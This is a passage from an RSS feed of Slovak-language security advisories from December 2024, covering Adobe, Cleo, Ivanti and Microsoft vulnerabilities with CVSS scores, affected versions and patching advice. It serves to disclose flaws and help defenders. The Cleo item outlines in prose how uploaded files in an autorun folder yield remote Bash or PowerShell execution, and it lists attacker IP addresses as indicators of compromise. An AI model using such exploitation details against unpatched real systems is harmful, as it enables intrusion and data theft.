<p>Pretečenie vyrovnávacej pamäte zásobníka a&nbsp;pretečenie medzipamäte haldy v&nbsp;rámci Adobe InDesign možno zneužiť na vykonanie škodlivého kódu.</p>



<p><strong>CVE-2024-49544 </strong>(CVSS skóre 7,8)</p>



<p>Zápis do pamäte mimo povolených hodnôt možno zneužiť na získanie neoprávneného prístupu k&nbsp;obsahu pamäte a&nbsp;úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému.</p>



<p><strong><u>Adobe PDFL Software Development Kit (SDK):</u></strong></p>



<p><strong>CVE-2024-49513 </strong>(CVSS skóre 7,8)</p>



<p>Kritickú zraniteľnosť v&nbsp;Adobe PDFL SDK možno zneužiť na vykonanie škodlivého kódu. Zraniteľnosť spočíva v&nbsp;zápise mimo povolených hodnôt pamäte.</p>



<p><strong><u>Adobe Connect:</u></strong></p>



<p><strong>CVE-2024-54032, CVE-2024-54036 </strong>(CVSS skóre 9,3), <strong>CVE-2024-54034 </strong>(CVSS skóre 8,0) a <strong>CVE-2024-54037 </strong>(CVSS skóre 7,3)</p>



<p>Bližšie nešpecifikované kritické zraniteľnosti v&nbsp;Adobe Connect by vzdialený útočník mohol zneužiť na realizáciu útokov tzv. Reflected XSS (Cross Site Scripting).</p>



<p><strong>CVE-2024-54035 </strong>(CVSS skóre 7,3)</p>



<p>Zraniteľnosť spočívajúcu v&nbsp;nesprávnej autorizácii by vzdialený neautentifikovaný útočník mohol zneužiť na eskaláciu privilégií. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.</p>



<p><strong><u>Adobe </u></strong> <strong><u>Substance 3D Sampler:</u></strong></p>



<p><strong>CVE-2024-52994, CVE-2024-52995, CVE-2024-52996 </strong>(CVSS skóre 7,8)</p>



<p>Zápis do pamäte mimo povolených hodnôt (CVE-2024-52994) a&nbsp;pretečenie medzipamäte haldy (ostatné) možno zneužiť na vykonanie kódu.</p>



<p><strong><u>Adobe Photoshop:</u></strong></p>



<p><strong>CVE-2024-52997 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosť, ktorá spočíva v&nbsp;použití odalokovaného miesta v&nbsp;pamäti, umožňuje vykonanie kódu.</p>



<p><strong><u>Adobe Substance 3D Modeler:</u></strong></p>



<p><strong>CVE-2024-52999, CVE-2024-53000, CVE-2024-53001, CVE-2024-53002, CVE-2024-53003 </strong>(CVSS skóre 7,8)</p>



<p>Produkt Adobe Substance 3D Modeler obsahuje zraniteľnosti, ktoré možno zneužiť na vykonanie kódu. Zraniteľnosť s&nbsp;identifikátorom CVE-2024-52999 spočíva v&nbsp;pretečení medzipamäte haldy a&nbsp;ostatné zraniteľnosti v&nbsp;zápise do pamäte mimo povolených hodnôt.</p>



<p><strong><u>Adobe Bridge:</u></strong></p>



<p><strong>CVE-2024-53955 </strong>(CVSS skóre 7,8)</p>



<p>Kritická zraniteľnosť s&nbsp;označením CVE-2024-53955 umožňuje zneužitie podtečenia celočíselnej premennej na vykonanie kódu.</p>



<p><strong><u>Adobe Premiere Pro:</u></strong></p>



<p><strong>CVE-2024-53956 </strong>(CVSS skóre 7,8)</p>



<p>Produkt Adobe Premiere Pro obsahuje zraniteľnosť, ktorá umožňuje vykonanie kódu.</p>



<p><strong><u>Adobe Substance 3D Painter:</u></strong></p>



<p><strong>CVE-2024-53957, CVE-2024-53958 </strong>(CVSS skóre 7,8)</p>



<p>Zápis do pamäte mimo povolených hodnôt (CVE-2024-53958) a&nbsp;pretečenie medzipamäte haldy (CVE-2024-53957) v&nbsp;Adobe Substance 3D Painter taktiež možno zneužiť na vykonanie kódu.</p>



<p><strong><u>Adobe FrameMaker:</u></strong></p>



<p><strong>CVE-2024-53959 </strong>(CVSS skóre 7,8)</p>



<p>Kritickej zraniteľnosti bol pridelený identifikátor CVE-2024-53959 a&nbsp;možno ju zneužiť na vykonanie kódu.</p>



<p><strong>Zneužitie vyššie uvedených zraniteľností (ak nie je uvedené inak) vyžaduje interakciu zo strany používateľa, ktorý musí stiahnuť a&nbsp;otvoriť špeciálne vytvorené súbory.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie škodlivého kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verzie špecifikované v&nbsp;časti Zraniteľné systémy alebo&nbsp;na webových stránkach výrobcu uvedených v&nbsp;časti Zdroje.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://helpx.adobe.com/security/products/experience-manager/apsb24-69.html">https://helpx.adobe.com/security/products/experience-manager/apsb24-69.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/acrobat/apsb24-92.html">https://helpx.adobe.com/security/products/acrobat/apsb24-92.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/media-encoder/apsb24-93.html">https://helpx.adobe.com/security/products/media-encoder/apsb24-93.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/illustrator/apsb24-94.html">https://helpx.adobe.com/security/products/illustrator/apsb24-94.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/after_effects/apsb24-95.html">https://helpx.adobe.com/security/products/after_effects/apsb24-95.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/animate/apsb24-96.html">https://helpx.adobe.com/security/products/animate/apsb24-96.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/indesign/apsb24-97.html">https://helpx.adobe.com/security/products/indesign/apsb24-97.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/pdfl-sdk1/apsb24-98.html">https://helpx.adobe.com/security/products/pdfl-sdk1/apsb24-98.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/connect/apsb24-99.html">https://helpx.adobe.com/security/products/connect/apsb24-99.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/substance3d-sampler/apsb24-100.html">https://helpx.adobe.com/security/products/substance3d-sampler/apsb24-100.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/photoshop/apsb24-101.html">https://helpx.adobe.com/security/products/photoshop/apsb24-101.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/substance3d-modeler/apsb24-102.html">https://helpx.adobe.com/security/products/substance3d-modeler/apsb24-102.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/bridge/apsb24-103.html">https://helpx.adobe.com/security/products/bridge/apsb24-103.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/premiere_pro/apsb24-104.html">https://helpx.adobe.com/security/products/premiere_pro/apsb24-104.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/substance3d_painter/apsb24-105.html">https://helpx.adobe.com/security/products/substance3d_painter/apsb24-105.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/framemaker/apsb24-106.html">https://helpx.adobe.com/security/products/framemaker/apsb24-106.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1833/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť v nástrojoch pre zabezpečený prenos súborov od spoločnosti Cleo</title>
		<link>/posts/1830</link>
					<comments>/posts/1830#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 12 Dec 2024 13:51:20 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cleo]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1830</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/Cleo-logo-NEW-4.png" alt="" /></p>Bezpečnostní výskumníci zo spoločnosti Huntress informovali o aktívne zneužívanej zraniteľnosti v nástrojoch pre zabezpečený prenos a zdieľanie súborov Cleo Harmony, Cleo...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/Cleo-logo-NEW-4.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci zo spoločnosti Huntress informovali o aktívne zneužívanej zraniteľnosti v nástrojoch pre zabezpečený prenos a zdieľanie súborov Cleo Harmony, Cleo VLTrader a Cleo LexiCom. Zraniteľnosť <strong>CVE-2024-55956</strong> možno zneužiť na získanie neoprávneného prístupu k citlivým údajom, vykonanie neoprávnených zmien v systéme a vzdialené vykonanie kódu. Zraniteľnosť v súčasnosti zneužíva aj ransomvérová skupina Clop.</strong></p>



<p><strong>[Aktualizované 17.12.2024]</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cleo Harmony vo verziách starších ako 5.8.0.24</li>



<li>Cleo VLTrader vo verziách starších ako 5.8.0.24</li>



<li>Cleo LexiCom vo verziách starších ako 5.8.0.24</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-55956 </strong>(CVSS skóre 9,8)</p>



<p>Jedná sa o zraniteľnosť podobnú staršej CVE-2024-50623, ktorá bola odstránená v rámci aktualizácií vydaných v októbri 2024. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>nahratie ľubovoľných súborov</strong> a <strong>vykonanie príkazov</strong> na hostiteľskom systéme.</p>



<p>Súbory umiestnené v&nbsp;priečinku <em>autorun</em> v&nbsp;koreňovom adresári aplikácií LexiCom, Harmony a VLTrader sú automaticky interpretované. Nahraním špeciálne vytvorených súborov zneužívajúcich zabudovanú funkcionalitu produktov <em>Import</em> možno dosiahnuť <strong>vzdialené vykonanie príkazov</strong> <strong>Bash alebo PowerShell </strong>definovaných v&nbsp;ďalších súboroch, ktoré nahral útočník.</p>



<p>V&nbsp;súčasnosti je <strong>dostupný </strong><strong>Proof of Concept</strong> (PoC) demonštrujúci mechanizmus zneužitia zraniteľnosti.</p>



<p><strong>Zraniteľnosť aktívne zneužívajú útočníci minimálne od 3. decembra 2024</strong>. Ransomvérová skupina CLOP ju v rámci útokov zneužíva na krádež citlivých údajov.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnená zmena v&nbsp;systéme</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Indikátory kompromitácie (IoC):</strong></p>



<ul>
<li>5.149.249[.]226</li>



<li>89.248.172[.]139</li>



<li>176.123.10[.]115</li>



<li>176.123.5[.]126</li>



<li>181.214.147[.]164</li>



<li>185.162.128[.]133</li>



<li>185.163.204[.]137</li>



<li>185.181.230[.]103</li>



<li>192.119.99[.]42</li>



<li>209.127.12[.]38</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Cleo Harmony, VLTrader a LexiCom aspoň na verziu 5.8.0.24.</p>



<p>Mitigovať zraniteľnosť je možné limitovaním prístupu k zraniteľným systémom prostredníctvom sieťových a bezpečnostných prvkov. Spusteniu kódu z priečinka <em>autoruns</em> možno zabrániť zmenou konfigurácie zraniteľných aplikácií podľa odporúčaní výskumníkov v časti <a href="https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild">How to Stay Protected</a>.</p>



<p>Vzhľadom na aktívne zneužívanie zraniteľnosti odporúčame dôkladne preveriť prítomnosť dostupných indikátorov kompromitácie v logoch sieťových a bezpečnostných prvkov.</p>



<p>Pokusy o&nbsp;zneužitie zraniteľnosti možno identifikovať analýzou logov aplikácií v&nbsp;priečinku <em>logs</em>. Taktiež odporúčame vykonať inšpekciu obsahu priečinkov <em>autorun</em> na prítomnosť podozrivých .TXT súborov a&nbsp;obsah <em>host</em> na prítomnosť podozrivých .XML súborov obsahujúcich príkazy Bash alebo PowerShell. K&nbsp;dispozícii sú aj Sigma pravidlá pre host-based detekciu [<a href="https://github.com/huntresslabs/threat-intel/blob/main/2024/2024-12/Cleo/sigma/win_proc_creation_cleo_exploitation_2024.yml">1</a>, <a href="https://github.com/huntresslabs/threat-intel/blob/main/2024/2024-12/Cleo/sigma/win_proc_creation_suspicious_powershell_from_javaw.yml">2</a>].</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.cleo.com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory-CVE-2024-50623">https://support.cleo.com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory-CVE-2024-50623</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-55956">https://nvd.nist.gov/vuln/detail/CVE-2024-55956</a></li>



<li><a href="https://www.rapid7.com/blog/post/2024/12/10/etr-widespread-exploitation-of-cleo-file-transfer-software-cve-2024-50623/">https://www.rapid7.com/blog/post/2024/12/10/etr-widespread-exploitation-of-cleo-file-transfer-software-cve-2024-50623/</a></li>



<li><a href="https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild">https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild</a></li>



<li><a href="https://censys.com/cve-2024-50623/">https://censys.com/cve-2024-50623/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/new-cleo-zero-day-rce-flaw-exploited-in-data-theft-attacks/">https://www.bleepingcomputer.com/news/security/new-cleo-zero-day-rce-flaw-exploited-in-data-theft-attacks/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/clop-ransomware-claims-responsibility-for-cleo-data-theft-attacks/">https://www.bleepingcomputer.com/news/security/clop-ransomware-claims-responsibility-for-cleo-data-theft-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1830/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické bezpečnostné zraniteľnosti v produktoch Ivanti CSA, ICS a IPS</title>
		<link>/posts/1827</link>
					<comments>/posts/1827#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 12 Dec 2024 12:34:47 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[Ivanti]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1827</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 8 bezpečnostných zraniteľností v&#160;produktoch&#160;Ivanti Cloud Services Application (CSA), Ivanti Desktop and Server Management...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>
<p><strong>Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 8 bezpečnostných zraniteľností v&nbsp;produktoch&nbsp;Ivanti Cloud Services Application (CSA), Ivanti Desktop and Server Management (DSM), Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS), Sentry a&nbsp;Patch SDK, z&nbsp;čoho 5 je označených ako kritické. Kritické zraniteľnosti v&nbsp;produktoch CSA, ICS a&nbsp;IPS možno zneužiť na SQL injekciu, vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom. Ostatné zraniteľnosti možno zneužiť na zneprístupnenie služby, vykonanie neoprávnených zmien v&nbsp;systéme a&nbsp;obídenie bezpečnostných mechanizmov.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ivanti Cloud Services Application vo verziách starších ako 5.0.3</li>



<li>Ivanti Desktop and Server Management vo verziách starších ako 2024.3.5740</li>



<li>Ivanti Connect Secure vo verziách starších ako 22.7R2.4</li>



<li>Ivanti Policy Secure vo verziách starších ako 22.7R1.2</li>



<li>Ivanti Sentry 9.20.X vo verziách starších ako 9.20.2</li>



<li>Ivanti Sentry 10.0.X vo verziách starších ako 10. 0.2</li>



<li>Ivanti Patch SDK vo verziách starších ako 9.7.703</li>
</ul>



<p>    <em>Pozn.: Zraniteľné verzie Ivanti Patch SDK sú používané v nasledujúcich produktoch:</em></p>



<ul>
<li>Ivanti Endpoint Manager 2022 SU6 bez bezpečnostných záplat z novembra 2024</li>



<li>Ivanti Endpoint Manager 2024 bez bezpečnostných záplat z&nbsp;novembra 2024</li>



<li>Ivanti Security Controls (iSec) vo verziách starších ako 2024.4 (9.6.9375.0)</li>



<li>Ivanti Patch for Configuration Manager vo verziách starších ako 2024.4 (2.5.1129.0)</li>



<li>Ivanti Neurons for Patch Management vo verziách starších ako 2024.4 (1.1.67.0)</li>



<li>Ivanti Neurons Agent Platform vo verziách starších ako 2024.4 (9.6.839)</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Ivanti Cloud Services Application (CSA):</u></strong></p>



<p><strong>CVE-2024-11639&nbsp;&nbsp; </strong>(CVSS skóre 10,0)</p>



<p>Najzávažnejšia zraniteľnosť spočíva v&nbsp;nedostatočnej implementácie mechanizmov autentifikácie a&nbsp;vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>získanie administrátorského prístupu do systému</strong>.</p>



<p><strong>CVE-2024-11772, CVE-2024-11773&nbsp; </strong>(CVSS skóre 9,1)</p>



<p>Kritické zraniteľnosti vo webovej administrátorskej konzole by vzdialený autentifikovaný útočník s&nbsp;oprávneniami administrátora mohol zneužiť na realizáciu <strong>SQL injekcie</strong> (CVE-2024-11773) a&nbsp;<strong>vzdialené vykonanie kódu</strong> (CVE-2024-11772).</p>



<p><strong><u>Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS):</u></strong></p>



<p><strong>CVE-2024-11633, CVE-2024-11634 </strong>(CVSS skóre 9,1)</p>



<p>Bližšie nešpecifikované <strong>kritické zraniteľnosti</strong> by vzdialený autentifikovaný útočník s&nbsp;oprávneniami administrátora prostredníctvom injekcie argumentov (CVE-2024-11633) a&nbsp;injekcie príkazov (CVE-2024-11634) mohol zneužiť <strong>na vzdialené vykonanie kódu</strong>.</p>



<p>Ostatné <strong>vysoko závažné zraniteľnosti</strong> v&nbsp;ICS a IPS umožňujú <strong>zneprístupnenie služby</strong> (CVE-2024-37377, CVE-2024-37401) a <strong>obídenie bezpečnostných mechanizmov</strong> (CVE-2024-9844).</p>



<p><strong><u>Ivanti Desktop and Server Management (DSM):</u></strong></p>



<p><strong>CVE-2024-7572 </strong>(CVSS skóre 7,1)</p>



<p>Vysoko závažná zraniteľnosť spočíva v&nbsp;nesprávnom nastavení oprávnení a&nbsp;lokálny autentifikovaný útočník by ju mohol zneužiť na <strong>zmazanie súborov na súborovom systéme</strong>, ktoré môže mať za následok úplné narušenie integrity a&nbsp;dostupnosti zraniteľných systémov.</p>



<p><strong><u>Ivanti Sentry:</u></strong></p>



<p><strong>CVE-2024-8540&nbsp; </strong>(CVSS skóre 8,8)</p>



<p>Nesprávne nastavenie oprávnení by&nbsp;lokálny autentifikovaný útočník mohol zneužiť na <strong>vykonanie neoprávnených zmien kritických komponentov aplikácie</strong> a&nbsp;získanie úplnej kontroly nad systémom.</p>



<p><strong><u>Ivanti Patch SDK:</u></strong></p>



<p><strong>CVE-2024-10256&nbsp;&nbsp; </strong>(CVSS skóre 7,1)</p>



<p>Zraniteľnosť v&nbsp;Patch SDK umožňuje lokálnemu autentifikovanému útočníkov <strong>zmazať súbory na súborovom systéme </strong>a&nbsp;spôsobiť tým úplné narušenie integrity a dostupnosti zraniteľných systémov. Nakoľko je Ivanti Patch SDK využívané aj v&nbsp;rámci produktov Ivanti Endpoint Manager, Ivanti Security Controls (iSec), Ivanti Patch for Configuration Manager a Ivanti Neurons Agent Platform, zraniteľné sú všetky verzie týchto produktov využívajúce zraniteľné SDK. Presný zoznam zraniteľných verzií môžete nájsť vyššie v&nbsp;časti Zraniteľné systémy alebo na <a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Patch-SDK-CVE-2024-10256?language=en_US">stránke</a> výrobcu.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnená zmena v&nbsp;systéme</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Obídenie bezpečnostných mechanizmov</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Výrobca odporúča používať len verzie s&nbsp;platnou technickou podporou a&nbsp;zasiahnuté systémy bezodkladne aktualizovať na najnovšie verzie. Konkrétne verzie produktov a&nbsp;návod na inštaláciu aktualizácií môžete nájsť na stránkach výrobcu v&nbsp;časti Zdroje.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Services-Application-CSA-CVE-2024-11639-CVE-2024-11772-CVE-2024-11773">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Services-Application-CSA-CVE-2024-11639-CVE-2024-11772-CVE-2024-11773</a></li>



<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Desktop-and-Server-Management-DSM-CVE-2024-7572">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Desktop-and-Server-Management-DSM-CVE-2024-7572</a></li>



<li><a href="https://forums.ivanti.com/s/article/December-2024-Security-Advisory-Ivanti-Connect-Secure-ICS-and-Ivanti-Policy-Secure-IPS-Multiple-CVEs">https://forums.ivanti.com/s/article/December-2024-Security-Advisory-Ivanti-Connect-Secure-ICS-and-Ivanti-Policy-Secure-IPS-Multiple-CVEs</a></li>



<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2024-8540">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2024-8540</a></li>



<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Patch-SDK-CVE-2024-10256">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Patch-SDK-CVE-2024-10256</a></li>



<li><a href="https://thehackernews.com/2024/12/ivanti-issues-critical-security-updates.html">https://thehackernews.com/2024/12/ivanti-issues-critical-security-updates.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1827/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v rámci decembrového Patch Tuesday opravil 17 kritických zraniteľností</title>
		<link>/posts/1825</link>
					<comments>/posts/1825#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 12 Dec 2024 12:21:03 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1825</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft vydala v&#160;decembri 2024 balík opráv pre portfólio svojich produktov opravujúci 72 zraniteľností, z&#160;ktorých 31 umožňuje vzdialené vykonávanie kódu....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala v&nbsp;decembri 2024 balík opráv pre portfólio svojich produktov opravujúci 72 zraniteľností, z&nbsp;ktorých 31 umožňuje vzdialené vykonávanie kódu. Kritické zraniteľnosti sa nachádzajú v&nbsp;komponentoch Windows Remote Desktop Services a Client, Windows Lightweight Directory Access Protocol a Client, Windows Hyper-V, Microsoft Message Queuing, Windows Local Security Authority Subsystem Service a&nbsp;možno ich zneužiť vzdialené vykonanie škodlivého kódu. Zraniteľnosť v&nbsp;komponente Windows Common Log File System Driver (CVE-2024-49138) v&nbsp;súčasnosti útočníci aktívne zneužívajú.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Microsoft 365 Apps for Enterprise for 32-bit Systems</li>



<li>Microsoft 365 Apps for Enterprise for 64-bit Systems</li>



<li>Microsoft Access 2016 (32-bit edition)</li>



<li>Microsoft Access 2016 (64-bit edition)</li>



<li>Microsoft Defender for Endpoint for Android</li>



<li>Microsoft Excel 2016 (32-bit edition)</li>



<li>Microsoft Excel 2016 (64-bit edition)</li>



<li>Microsoft Office 2016 (32-bit edition)</li>



<li>Microsoft Office 2016 (64-bit edition)</li>



<li>Microsoft Office 2019 for 32-bit editions</li>



<li>Microsoft Office 2019 for 64-bit editions</li>



<li>Microsoft Office LTSC 2021 for 32-bit editions</li>



<li>Microsoft Office LTSC 2021 for 64-bit editions</li>



<li>Microsoft Office LTSC 2024 for 32-bit editions</li>



<li>Microsoft Office LTSC 2024 for 64-bit editions</li>



<li>Microsoft Office LTSC for Mac 2021</li>



<li>Microsoft Office LTSC for Mac 2024</li>



<li>Microsoft SharePoint Enterprise Server 2016</li>



<li>Microsoft SharePoint Server 2019</li>



<li>Microsoft SharePoint Server Subscription Edition</li>



<li>Microsoft Word 2016 (32-bit edition)</li>



<li>Microsoft Word 2016 (64-bit edition)</li>



<li>Microsoft/Muzic</li>



<li>Remote Desktop client for Windows Desktop</li>



<li>System Center Operations Manager (SCOM) 2019</li>



<li>System Center Operations Manager (SCOM) 2022</li>



<li>System Center Operations Manager (SCOM) 2025</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems</li>



<li>Windows 11 Version 24H2 for x64-based Systems</li>



<li>Windows App Client for Windows Desktop</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>



<li>Windows Server 2025</li>



<li>Windows Server 2025 (Server Core installation)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>I. Kritické zraniteľnosti:</strong></p>



<p><strong>CVE-2024-49105</strong> (CVSS skóre 8,4)</p>



<p>Kritická zraniteľnosť v&nbsp;<strong>Remote Desktop Client</strong> spočíva v&nbsp;nesprávnej implementácii mechanizmov riadenia prístupu a&nbsp;vzdialený útočník by ju mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>. Zneužitie zraniteľnosti <strong>vyžaduje interakciu</strong> zo strany používateľa s&nbsp;oprávneniami administrátora, ktorý musí iniciovať spojenie Remote Desktop (RDP) na škodlivý server pod kontrolou útočníka.</p>



<p><strong>CVE-2024-49106, CVE-2024-49108, CVE-2024-49115, CVE-2024-49116, CVE-2024-49119, CVE-2024-49120, CVE-2024-49123, CVE-2024-49128, CVE-2024-49132 </strong>(CVSS skóre 8,1)</p>



<p>Zraniteľnosti v&nbsp;komponente <strong>Windows Remote Desktop Services</strong> spočívajú v&nbsp;použití odalokovaného miesta v pamäti a nedostatočnom zabezpečení citlivých údajov v pamäti (CVE-2024-49106, CVE-2024-49108, CVE-2024-49115, CVE-2024-49116, CVE-2024-49123, CVE-2024-49128, CVE-2024-49132), nesprávnom vyhodnocovaní dátových typov (CVE-2024-49119) a nesprávnej inicializácii premenných (CVE-2024-49120) a&nbsp;umožňujú <strong>vzdialené vykonanie kódu</strong>. Zraniteľnosť možno zneužiť pripojením sa na zraniteľné systémy v&nbsp;konfigurácii Remote Desktop Gateway. Úspešné zneužitie zraniteľností vyžaduje, aby útočník vyhral súbeh procesov.</p>



<p><strong>CVE-2024-49112</strong> (CVSS skóre 9,8)</p>



